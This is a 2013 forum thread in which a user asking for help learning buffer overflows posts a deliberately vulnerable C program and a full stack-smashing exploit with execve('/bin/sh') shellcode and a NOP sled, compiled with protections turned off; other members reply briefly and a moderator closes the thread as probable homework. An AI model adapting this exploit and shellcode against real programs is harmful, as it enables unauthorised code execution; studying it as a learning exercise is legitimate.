You are not logged in.

#1 2013-01-15 01:19:00

leetow2003
Member
Registered: 2012-04-08
Posts: 25

How to solve this problem?

I only want to test buffer overflow,
Look:

//vulnerable.c
#include <stdio.h>
#include <string.h>

int main(int argc,char *argv[])
{
  char buffer[512];
  if(argc>1)
    strcpy(buffer,argv[1]);
}
//exploit.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define OFFSET 0
#define RET_POSITION 1024
#define RANGE 20
#define NOP 0x90

char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x88\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp()
{
        __asm__("movl %esp,%eax");
}


int main(int argc, char *argv[])
{
        char buff[RET_POSITION+RANGE+1],*ptr;
        long addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
        int i;

        if(argc>1)
            offset=atoi(argv[1]);
        sp=get_sp();
        addr=sp-offset;

            for(i=0;i<bsize;i+=4)
          *((long*)(&(buff[i])))=addr;
    
        for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
            buff[i]=NOP;
    
        ptr=buff+(bsize-RANGE*2-strlen(shellcode)-1);
        for(i=0;i<strlen(shellcode);i++)
            *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08x\n",addr);
        execl("./vulnerable","vulnerable",buff,0);

        return 0;
}

and when I compile the exploit.c,I add parameters:
-mpreferred-stack-boundary=2 -fno-stack-protector -z execstack
but I run ./exploit 500,or other positive value or negative value,
it always display:Segmentation fault,I only want to learn
buffer overflow,so who could help me?Thank you very much.

Offline

#2 2013-01-15 01:35:37

WonderWoofy
Member
From: Los Gatos, CA
Registered: 2012-05-19
Posts: 8,412

Re: How to solve this problem?

Please change your title to something that actually describes your issue.

Offline

#3 2013-01-15 16:50:53

Trent
Member
From: Baltimore, MD (US)
Registered: 2009-04-16
Posts: 987

Re: How to solve this problem?

Did you do research to find a particular type of buffer overflow exploit that your hardware and OS are susceptible to, or did you just copy something you found on the Internet? Most exploits have an annoying tendency to be fixed once people know they exist.

Offline

#4 2013-01-15 18:52:36

ewaller
Administrator
From: Pasadena, CA
Registered: 2009-07-13
Posts: 12,700

Re: How to solve this problem?

This has the look and feel of homework

Closing.  If I am wrong, please contact a moderator and make a case.  Leaving the thread here -- for now.


Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
Like you, I have no idea what you are doing, but I am pretty sure it is wrong...Jasonwryan
----
How to Ask Questions the Smart Way

Online

Board footer

Powered by FluxBB